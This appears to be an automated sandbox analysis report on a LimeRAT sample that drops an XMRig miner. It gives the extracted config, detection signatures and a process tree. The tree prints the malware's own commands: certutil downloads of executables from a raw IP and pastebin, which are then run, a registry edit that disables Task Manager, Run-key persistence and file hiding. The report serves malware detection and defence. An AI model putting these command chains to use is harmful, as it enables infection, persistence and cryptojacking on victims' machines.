limerat | 75180613894eb3345319cc207d66688e5219035a05e97d330a2397d51cc397c6

Analysis

max time kernel
23s
max time network
154s
platform
windows7_x64
resource
win7-20220901-en
resource tags

arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
submitted
14-09-2022 23:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

eb9e4955edda276425933aea122f9a84.exe
Size

47KB
MD5

eb9e4955edda276425933aea122f9a84
SHA1

6763106ffdc12cf213f579f72c1c6e8f3272fa9c
SHA256

75180613894eb3345319cc207d66688e5219035a05e97d330a2397d51cc397c6
SHA512

621cb956531c7e70715cb14eb3b5ff030fa1b3387a97b7ef04a847bdb54878ad713162115c78ce46dca3d3f11b5742a23e8a1fecd34e30429e934c487aafa60f
SSDEEP

768:e7DiMIvhyqeFRKUKPl2+Vf7lWDVkUmg1/oRxf0IbvDOPbPlEnNFqoBc:KiMdzgdoEfskV8Of9bvDI7GDlBc

Score

10^/10

limerat xmrig evasion miner persistence rat upx

Malware Config

Extracted

Family

limerat

Attributes

aes_key
beodz
antivm
false
c2_url
https://pastebin.com/raw/PEKpeQWU
delay
3
download_payload
false
install
true
install_name
winlogon.exe
main_folder
AppData
pin_spread
false
sub_folder
\AppData\Windows Protector\
usb_spread
false

Signatures

LimeRAT
Simple yet powerful RAT for Windows machines written in .NET.
rat limerat
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 4 IoCs

miner

resource	yara_rule
behavioral1/files/0x00060000000143a3-201.dat	xmrig
behavioral1/memory/2956-211-0x000000013F990000-0x0000000140158000-memory.dmp	xmrig
behavioral1/memory/2956-213-0x000000013F990000-0x0000000140158000-memory.dmp	xmrig
behavioral1/memory/2488-216-0x000000013F1A0000-0x000000013F968000-memory.dmp	xmrig

Blocklisted process makes network request 2 IoCs

flow	pid	Process
19	980	WScript.exe
20	1332	WScript.exe

Disables Task Manager via registry modification
evasion
Downloads MZ/PE file

Executes dropped EXE 5 IoCs

pid	Process
1508	IE.exe
576	windowsapp.exe
1360	irom.com
1888	lirb.com
1604	winlogon.exe

Sets file to hidden 1 TTPs 7 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1158

pid	Process
1208	attrib.exe
1188	attrib.exe
908	attrib.exe
924	attrib.exe
1516	attrib.exe
1640	attrib.exe
936	attrib.exe

UPX packed file 12 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/1268-59-0x0000000140000000-0x0000000140023000-memory.dmp	upx
behavioral1/memory/1268-82-0x0000000140000000-0x0000000140023000-memory.dmp	upx
behavioral1/files/0x0007000000012739-83.dat	upx
behavioral1/files/0x0007000000012739-84.dat	upx
behavioral1/files/0x0007000000012739-86.dat	upx
behavioral1/files/0x0007000000012739-85.dat	upx
behavioral1/files/0x0007000000012739-88.dat	upx
behavioral1/memory/576-124-0x0000000000400000-0x0000000000419000-memory.dmp	upx
behavioral1/files/0x000900000001267b-150.dat	upx
behavioral1/files/0x000c0000000122f3-153.dat	upx
behavioral1/files/0x000e000000005c51-155.dat	upx
behavioral1/memory/576-215-0x0000000000400000-0x0000000000419000-memory.dmp	upx

Drops startup file 9 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\main.vbs	attrib.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exe	xcopy.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\main.vbs	WScript.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\backup.vbs	WScript.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\backup.vbs	attrib.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini	attrib.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exe	xcopy.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\main.vbs	WScript.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\backup.vbs	WScript.exe

Loads dropped DLL 9 IoCs

pid	Process
1508	IE.exe
1508	IE.exe
1508	IE.exe
1508	IE.exe
1888	lirb.com
1888	lirb.com
1888	lirb.com
1888	lirb.com
1888	lirb.com

Adds Run key to start application 2 TTPs 12 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\main = "\"C:\\Users\\Admin\\AppData\\Roaming\\AppData\\Flash Player\\\\main.vbs\""	WScript.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\software\microsoft\windows\currentversion\run	WScript.exe
Key created	\REGISTRY\MACHINE\software\Wow6432Node\microsoft\windows\currentversion\run	WScript.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Logons = "C:\\Windows (x86)\\explorer.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Updates = "C:\\Users\\Admin\\AppData\\Roaming\\AppData\\Windows Updates\\winupdate.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\software\microsoft\windows\currentversion\run	WScript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Windows\CurrentVersion\Run\main = "\"C:\\Users\\Admin\\AppData\\Roaming\\AppData\\Flash Player\\\\main.vbs\""	WScript.exe
Key created	\REGISTRY\MACHINE\software\Wow6432Node\microsoft\windows\currentversion\run	WScript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Windows\CurrentVersion\Run\backup = "\"C:\\Users\\Admin\\AppData\\Roaming\\AppData\\Flash Player\\\\backup.vbs\""	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\backup = "\"C:\\Users\\Admin\\AppData\\Roaming\\AppData\\Flash Player\\\\backup.vbs\""	WScript.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Kills process with taskkill 3 IoCs

evasion

pid	Process
1880	taskkill.exe
436	taskkill.exe
1916	taskkill.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

pid	Process
1020	reg.exe
1724	reg.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2588	PING.EXE

Suspicious behavior: CmdExeWriteProcessMemorySpam 3 IoCs

pid	Process
1508	IE.exe
1360	irom.com
1888	lirb.com

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	1940	WMIC.exe
Token: SeSecurityPrivilege	1940	WMIC.exe
Token: SeTakeOwnershipPrivilege	1940	WMIC.exe
Token: SeLoadDriverPrivilege	1940	WMIC.exe
Token: SeSystemProfilePrivilege	1940	WMIC.exe
Token: SeSystemtimePrivilege	1940	WMIC.exe
Token: SeProfSingleProcessPrivilege	1940	WMIC.exe
Token: SeIncBasePriorityPrivilege	1940	WMIC.exe
Token: SeCreatePagefilePrivilege	1940	WMIC.exe
Token: SeBackupPrivilege	1940	WMIC.exe
Token: SeRestorePrivilege	1940	WMIC.exe
Token: SeShutdownPrivilege	1940	WMIC.exe
Token: SeDebugPrivilege	1940	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1940	WMIC.exe
Token: SeRemoteShutdownPrivilege	1940	WMIC.exe
Token: SeUndockPrivilege	1940	WMIC.exe
Token: SeManageVolumePrivilege	1940	WMIC.exe
Token: 33	1940	WMIC.exe
Token: 34	1940	WMIC.exe
Token: 35	1940	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1940	WMIC.exe
Token: SeSecurityPrivilege	1940	WMIC.exe
Token: SeTakeOwnershipPrivilege	1940	WMIC.exe
Token: SeLoadDriverPrivilege	1940	WMIC.exe
Token: SeSystemProfilePrivilege	1940	WMIC.exe
Token: SeSystemtimePrivilege	1940	WMIC.exe
Token: SeProfSingleProcessPrivilege	1940	WMIC.exe
Token: SeIncBasePriorityPrivilege	1940	WMIC.exe
Token: SeCreatePagefilePrivilege	1940	WMIC.exe
Token: SeBackupPrivilege	1940	WMIC.exe
Token: SeRestorePrivilege	1940	WMIC.exe
Token: SeShutdownPrivilege	1940	WMIC.exe
Token: SeDebugPrivilege	1940	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1940	WMIC.exe
Token: SeRemoteShutdownPrivilege	1940	WMIC.exe
Token: SeUndockPrivilege	1940	WMIC.exe
Token: SeManageVolumePrivilege	1940	WMIC.exe
Token: 33	1940	WMIC.exe
Token: 34	1940	WMIC.exe
Token: 35	1940	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2036	WMIC.exe
Token: SeSecurityPrivilege	2036	WMIC.exe
Token: SeTakeOwnershipPrivilege	2036	WMIC.exe
Token: SeLoadDriverPrivilege	2036	WMIC.exe
Token: SeSystemProfilePrivilege	2036	WMIC.exe
Token: SeSystemtimePrivilege	2036	WMIC.exe
Token: SeProfSingleProcessPrivilege	2036	WMIC.exe
Token: SeIncBasePriorityPrivilege	2036	WMIC.exe
Token: SeCreatePagefilePrivilege	2036	WMIC.exe
Token: SeBackupPrivilege	2036	WMIC.exe
Token: SeRestorePrivilege	2036	WMIC.exe
Token: SeShutdownPrivilege	2036	WMIC.exe
Token: SeDebugPrivilege	2036	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2036	WMIC.exe
Token: SeRemoteShutdownPrivilege	2036	WMIC.exe
Token: SeUndockPrivilege	2036	WMIC.exe
Token: SeManageVolumePrivilege	2036	WMIC.exe
Token: 33	2036	WMIC.exe
Token: 34	2036	WMIC.exe
Token: 35	2036	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2036	WMIC.exe
Token: SeSecurityPrivilege	2036	WMIC.exe
Token: SeTakeOwnershipPrivilege	2036	WMIC.exe
Token: SeLoadDriverPrivilege	2036	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1268 wrote to memory of 1288	1268	eb9e4955edda276425933aea122f9a84.exe	27
PID 1268 wrote to memory of 1288	1268	eb9e4955edda276425933aea122f9a84.exe	27
PID 1268 wrote to memory of 1288	1268	eb9e4955edda276425933aea122f9a84.exe	27
PID 1288 wrote to memory of 932	1288	cmd.exe	29
PID 1288 wrote to memory of 932	1288	cmd.exe	29
PID 1288 wrote to memory of 932	1288	cmd.exe	29
PID 1288 wrote to memory of 1440	1288	cmd.exe	32
PID 1288 wrote to memory of 1440	1288	cmd.exe	32
PID 1288 wrote to memory of 1440	1288	cmd.exe	32
PID 1288 wrote to memory of 1332	1288	cmd.exe	33
PID 1288 wrote to memory of 1332	1288	cmd.exe	33
PID 1288 wrote to memory of 1332	1288	cmd.exe	33
PID 1288 wrote to memory of 1940	1288	cmd.exe	34
PID 1288 wrote to memory of 1940	1288	cmd.exe	34
PID 1288 wrote to memory of 1940	1288	cmd.exe	34
PID 1288 wrote to memory of 2036	1288	cmd.exe	36
PID 1288 wrote to memory of 2036	1288	cmd.exe	36
PID 1288 wrote to memory of 2036	1288	cmd.exe	36
PID 1288 wrote to memory of 1928	1288	cmd.exe	37
PID 1288 wrote to memory of 1928	1288	cmd.exe	37
PID 1288 wrote to memory of 1928	1288	cmd.exe	37
PID 1288 wrote to memory of 1724	1288	cmd.exe	38
PID 1288 wrote to memory of 1724	1288	cmd.exe	38
PID 1288 wrote to memory of 1724	1288	cmd.exe	38
PID 1288 wrote to memory of 2004	1288	cmd.exe	39
PID 1288 wrote to memory of 2004	1288	cmd.exe	39
PID 1288 wrote to memory of 2004	1288	cmd.exe	39
PID 1288 wrote to memory of 1624	1288	cmd.exe	40
PID 1288 wrote to memory of 1624	1288	cmd.exe	40
PID 1288 wrote to memory of 1624	1288	cmd.exe	40
PID 1288 wrote to memory of 1448	1288	cmd.exe	41
PID 1288 wrote to memory of 1448	1288	cmd.exe	41
PID 1288 wrote to memory of 1448	1288	cmd.exe	41
PID 1288 wrote to memory of 1508	1288	cmd.exe	42
PID 1288 wrote to memory of 1508	1288	cmd.exe	42
PID 1288 wrote to memory of 1508	1288	cmd.exe	42
PID 1288 wrote to memory of 1508	1288	cmd.exe	42
PID 1288 wrote to memory of 620	1288	cmd.exe	43
PID 1288 wrote to memory of 620	1288	cmd.exe	43
PID 1288 wrote to memory of 620	1288	cmd.exe	43
PID 1508 wrote to memory of 576	1508	IE.exe	44
PID 1508 wrote to memory of 576	1508	IE.exe	44
PID 1508 wrote to memory of 576	1508	IE.exe	44
PID 1508 wrote to memory of 576	1508	IE.exe	44
PID 576 wrote to memory of 1440	576	windowsapp.exe	45
PID 576 wrote to memory of 1440	576	windowsapp.exe	45
PID 576 wrote to memory of 1440	576	windowsapp.exe	45
PID 576 wrote to memory of 1440	576	windowsapp.exe	45
PID 1440 wrote to memory of 1264	1440	cmd.exe	47
PID 1440 wrote to memory of 1264	1440	cmd.exe	47
PID 1440 wrote to memory of 1264	1440	cmd.exe	47
PID 1440 wrote to memory of 1880	1440	cmd.exe	48
PID 1440 wrote to memory of 1880	1440	cmd.exe	48
PID 1440 wrote to memory of 1880	1440	cmd.exe	48
PID 1440 wrote to memory of 1552	1440	cmd.exe	49
PID 1440 wrote to memory of 1552	1440	cmd.exe	49
PID 1440 wrote to memory of 1552	1440	cmd.exe	49
PID 1440 wrote to memory of 436	1440	cmd.exe	50
PID 1440 wrote to memory of 436	1440	cmd.exe	50
PID 1440 wrote to memory of 436	1440	cmd.exe	50
PID 1440 wrote to memory of 1920	1440	cmd.exe	51
PID 1440 wrote to memory of 1920	1440	cmd.exe	51
PID 1440 wrote to memory of 1920	1440	cmd.exe	51
PID 1440 wrote to memory of 1916	1440	cmd.exe	52

Views/modifies file attributes 1 TTPs 15 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
1336	attrib.exe
1516	attrib.exe
2772	attrib.exe
936	attrib.exe
1188	attrib.exe
1260	attrib.exe
700	attrib.exe
908	attrib.exe
1640	attrib.exe
2480	attrib.exe
1640	attrib.exe
1208	attrib.exe
924	attrib.exe
1140	attrib.exe
1340	attrib.exe

C:\Users\Admin\AppData\Local\Temp\eb9e4955edda276425933aea122f9a84.exe
"C:\Users\Admin\AppData\Local\Temp\eb9e4955edda276425933aea122f9a84.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1268
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1102.tmp\1103.bat C:\Users\Admin\AppData\Local\Temp\eb9e4955edda276425933aea122f9a84.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1288
- - C:\Windows\system32\certutil.exe
    certutil -urlcache -split -f https://pastebin.com/raw/gGQgTLmg "C:\Users\Admin\AppData\Local\Temp\VERIU.BAT"
    3⤵
    PID:932
- - C:\Windows\system32\find.exe
    find /c "ECHO OK" "C:\Users\Admin\AppData\Local\Temp\VERIU.BAT"
    3⤵
    PID:1440
- - C:\Windows\system32\cmd.exe
    cmd /c del "C:\Users\Admin\AppData\Local\Temp\"C:\Users\Admin\AppData\Local\Temp\VERIU.BAT""
    3⤵
    PID:1332
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic process where name='taskmgr.exe' delete
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1940
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic process where name='Taskmgr.exe' delete
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2036
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic process where name='xmrig.exe' delete
    3⤵
    PID:1928
- - C:\Windows\system32\reg.exe
    REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:1724
- - C:\Windows\system32\certutil.exe
    certutil -urlcache -split -f https://pastebin.com/raw/03Gje1tb "C:\Users\Admin\AppData\Local\Temp\windowscheck_182352115_log.bat"
    3⤵
    PID:2004
- - C:\Windows\system32\find.exe
    find /c "set active" "C:\Users\Admin\AppData\Local\Temp\windowscheck_182352115_log.bat"
    3⤵
    PID:1624
- - C:\Windows\system32\certutil.exe
    certutil -urlcache -split -f "http://52.77.214.77:8083/IE.exe" C:\Users\Admin\AppData\Local\Temp\IE.exe
    3⤵
    PID:1448
- - C:\Users\Admin\AppData\Local\Temp\IE.exe
    "C:\Users\Admin\AppData\Local\Temp\IE.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious use of WriteProcessMemory
    PID:1508
  - - C:\Users\Admin\AppData\Local\Temp\updateW\windowsapp.exe
      "C:\Users\Admin\AppData\Local\Temp\updateW\windowsapp.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:576
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\47CB.tmp\47CC.bat C:\Users\Admin\AppData\Local\Temp\updateW\windowsapp.exe"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1440
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic process where name='taskmgr.exe' delete
        6⤵
        
        PID:1264
      - C:\Windows\system32\taskkill.exe
        
        taskkill /IM taskmgr.exe /F
        6⤵
        Kills process with taskkill
        
        PID:1880
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic process where name='Taskmgr.exe' delete
        6⤵
        
        PID:1552
      - C:\Windows\system32\taskkill.exe
        
        taskkill /IM Taskmgr.exe /F
        6⤵
        Kills process with taskkill
        
        PID:436
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic process where name='xmrig.exe' delete
        6⤵
        
        PID:1920
      - C:\Windows\system32\taskkill.exe
        
        taskkill /IM xmrig.exe /F
        6⤵
        Kills process with taskkill
        
        PID:1916
      - C:\Windows\system32\reg.exe
        
        REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        6⤵
        Modifies registry key
        
        PID:1020
      - C:\Windows\system32\attrib.exe
        
        attrib -s -h "C:\Users\Admin\AppData\Roaming\AppData\Flash Player\*.*"
        6⤵
        Views/modifies file attributes
        
        PID:1336
      - C:\Windows\system32\attrib.exe
        
        attrib -s -h "C:\Users\Admin\AppData\Roaming\AppData\Flash Player\"
        6⤵
        Views/modifies file attributes
        
        PID:1640
      - C:\Windows\system32\xcopy.exe
        
        xcopy "C:\Users\Admin\AppData\Local\Temp\updateW\backup.vbs" "C:\Users\Admin\AppData\Roaming\AppData\Flash Player" /K /D /H /Y
        6⤵
        
        PID:1108
      - C:\Windows\system32\xcopy.exe
        
        xcopy "C:\Users\Admin\AppData\Local\Temp\updateW\main.vbs" "C:\Users\Admin\AppData\Roaming\AppData\Flash Player" /K /D /H /Y
        6⤵
        
        PID:1708
      - C:\Users\Admin\AppData\Local\Temp\updateW\irom.com
        
        "C:\Users\Admin\AppData\Local\Temp\updateW\irom.com"
        6⤵
        Executes dropped EXE
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:1360
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\AppData\Flash Player\main.vbs"
        7⤵
        Blocklisted process makes network request
        Drops startup file
        Adds Run key to start application
        
        PID:980
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\AppData\Flash Player\backup.vbs"
        7⤵
        Blocklisted process makes network request
        Drops startup file
        Adds Run key to start application
        
        PID:1332
      - C:\Users\Admin\AppData\Local\Temp\updateW\lirb.com
        
        "C:\Users\Admin\AppData\Local\Temp\updateW\lirb.com"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:1888
        
        C:\Users\Admin\AppData\Roaming\AppData\Windows Protector\winlogon.exe
        
        "C:\Users\Admin\AppData\Roaming\AppData\Windows Protector\winlogon.exe"
        7⤵
        Executes dropped EXE
        
        PID:1604
      - C:\Windows\system32\attrib.exe
        
        attrib +s +h "C:\Users\Admin\AppData\Roaming\AppData\Flash Player\*.*"
        6⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:936
      - C:\Windows\system32\attrib.exe
        
        attrib +s +h "C:\Users\Admin\AppData\Roaming\AppData\Flash Player\"
        6⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:1208
      - C:\Windows\system32\attrib.exe
        
        attrib +s +h "C:\Users\Admin\AppData\Roaming\AppData\Windows Protector\*.*"
        6⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:1188
      - C:\Windows\system32\attrib.exe
        
        attrib +s +h "C:\Users\Admin\AppData\Roaming\AppData\Windows Protector"
        6⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:908
      - C:\Windows\system32\attrib.exe
        
        attrib +s +h "C:\Users\Admin\AppData\Roaming\AppData"
        6⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:924
      - C:\Windows\system32\certutil.exe
        
        certutil -urlcache -split -f https://pastebin.com/raw/gGQgTLmg "C:\Users\Admin\AppData\Local\Temp\VERIU.BAT"
        6⤵
        
        PID:1680
      - C:\Windows\system32\find.exe
        
        find /c "ECHO OK" "C:\Users\Admin\AppData\Local\Temp\VERIU.BAT"
        6⤵
        
        PID:1708
      - C:\Windows\system32\cmd.exe
        
        cmd /c del "C:\Users\Admin\AppData\Local\Temp\updateW\"C:\Users\Admin\AppData\Local\Temp\VERIU.BAT""
        6⤵
        
        PID:1964
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic process where name='Microsoft.exe' delete
        6⤵
        
        PID:1468
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic process where name='winupdate.exe' delete
        6⤵
        
        PID:1280
      - C:\Windows\system32\reg.exe
        
        REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Windows Logons" /t REG_SZ /F /D "C:\Windows (x86)\explorer.exe"
        6⤵
        Adds Run key to start application
        
        PID:1268
      - C:\Windows\system32\reg.exe
        
        REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Windows Updates" /t REG_SZ /F /D "C:\Users\Admin\AppData\Roaming\AppData\Windows Updates\winupdate.exe"
        6⤵
        Adds Run key to start application
        
        PID:812
      - C:\Windows\system32\attrib.exe
        
        attrib -s -h "C:\Users\Admin\AppData\Roaming\AppData\Windows Updates"
        6⤵
        Views/modifies file attributes
        
        PID:1140
      - C:\Windows\system32\attrib.exe
        
        attrib -s -h "C:\Users\Admin\AppData\Roaming\AppData\Windows Updates\*.*"
        6⤵
        Views/modifies file attributes
        
        PID:1340
      - C:\Windows\system32\attrib.exe
        
        attrib -s -h "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.*"
        6⤵
        Drops startup file
        Views/modifies file attributes
        
        PID:1260
      - C:\Windows\system32\xcopy.exe
        
        xcopy "C:\Users\Admin\AppData\Local\Temp\updateW\winupdate.exe" "C:\Users\Admin\AppData\Roaming\AppData\Windows Updates" /K /D /H /Y
        6⤵
        
        PID:1724
      - C:\Windows\system32\xcopy.exe
        
        xcopy "C:\Users\Admin\AppData\Local\Temp\updateW\Microsoft.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" /K /D /H /Y
        6⤵
        Drops startup file
        
        PID:1956
      - C:\Windows\system32\attrib.exe
        
        attrib +s +h "C:\Users\Admin\AppData\Roaming\AppData\Windows Updates\*.*"
        6⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:1516
      - C:\Windows\system32\attrib.exe
        
        attrib +s +h "C:\Users\Admin\AppData\Roaming\AppData\Windows Updates"
        6⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:1640
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic process where ExecutablePath='C:\\Windows (x86)\\explorer.exe' delete
        6⤵
        
        PID:1552
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic process where ExecutablePath='C:\\Windows (x86)\\PolicyDefinitions\\en-US\\regedit.exe' delete
        6⤵
        
        PID:1204
      - C:\Windows\system32\attrib.exe
        
        attrib -s -h "C:\Windows (x86)\*.*"
        6⤵
        Views/modifies file attributes
        
        PID:700
      - C:\Windows\system32\certutil.exe
        
        certutil -urlcache -split -f "http://52.77.214.77:8083/xm/win.com" "C:\Users\Admin\AppData\Local\Temp\updateW\win.com"
        6⤵
        
        PID:1232
      - C:\Windows\system32\certutil.exe
        
        certutil -urlcache -split -f "http://52.77.214.77:8083/xm/64a1.com" "C:\Users\Admin\AppData\Local\Temp\updateW\64a1.com"
        6⤵
        
        PID:2392
      - C:\Users\Admin\AppData\Local\Temp\updateW\64a1.com
        
        "C:\Users\Admin\AppData\Local\Temp\updateW\64a1.com"
        6⤵
        
        PID:2532
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Windows (x86)\aarun.vbs"
        7⤵
        
        PID:2632
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Windows (x86)\xagal.bat" "
        8⤵
        
        PID:2692
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic process where ExecutablePath='C:\\Windows (x86)\\explorer.exe' delete
        9⤵
        
        PID:2728
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib -s -h "C:\Windows (x86)\*.*"
        9⤵
        Views/modifies file attributes
        
        PID:2772
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wmic csproduct get UUID /format:list |find "="
        9⤵
        
        PID:2892
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic csproduct get UUID /format:list
        10⤵
        
        PID:2904
        
        C:\Windows\SysWOW64\find.exe
        
        find "="
        10⤵
        
        PID:2916
        
        C:\Windows (x86)\explorer.exe
        
        "C:\Windows (x86)\explorer.exe"
        9⤵
        
        PID:2956
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c del "C:\Windows (x86)\xagal.bat"
        9⤵
        
        PID:2988
      - C:\Users\Admin\AppData\Local\Temp\updateW\win.com
        
        "C:\Users\Admin\AppData\Local\Temp\updateW\win.com"
        6⤵
        
        PID:2560
      - C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 5
        6⤵
        Runs ping.exe
        
        PID:2588
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic process where ExecutablePath='C:\\Windows (x86)\\explorer.exe' delete
        6⤵
        
        PID:1980
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic process where ExecutablePath='C:\\Windows (x86)\\PolicyDefinitions\\en-US\\regedit.exe' delete
        6⤵
        
        PID:2172
      - C:\Windows\system32\attrib.exe
        
        attrib -s -h "C:\Windows (x86)\*.*"
        6⤵
        Views/modifies file attributes
        
        PID:2480
      - C:\Windows (x86)\explorer.exe
        
        "C:\Windows (x86)\explorer.exe"
        6⤵
        
        PID:2488
- - C:\Windows\system32\cmd.exe
    cmd /c del "C:\Users\Admin\AppData\Local\Temp\"C:\Users\Admin\AppData\Local\Temp\windowscheck_182352115_log.bat""
    3⤵
    PID:620

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Hidden Files and Directories

T1158

Modify Registry

T1112

Web Service

T1102

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\9E610D72817F59FAB1BFA75BAAB7746D

Filesize
132B

MD5
cc9ff4010b7de68a7328981e59618920

SHA1
d709369490a2544d620ba0df857dadd0bb0d791c

SHA256
b833c8c8433ea9967887502359228be622959ff2e5cf7286112d7a15b7b7eb24

SHA512
e6053527ee46b281a43571519d46cf20f7909bf9f71097fda3489fdfd501f9928f3e3e4394673d91f3260d6fb4d906eb226fc7f87d5e279deb6af5ee140ae573

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
0039281780a291fc44ae3e0e63073053

SHA1
9f152be5bc8c8f9b7760349c53916f2b98c92971

SHA256
ba73c4cab4e0ff12848baee8d67b7f68c79e417b26006faa8af56d9b4375d09b

SHA512
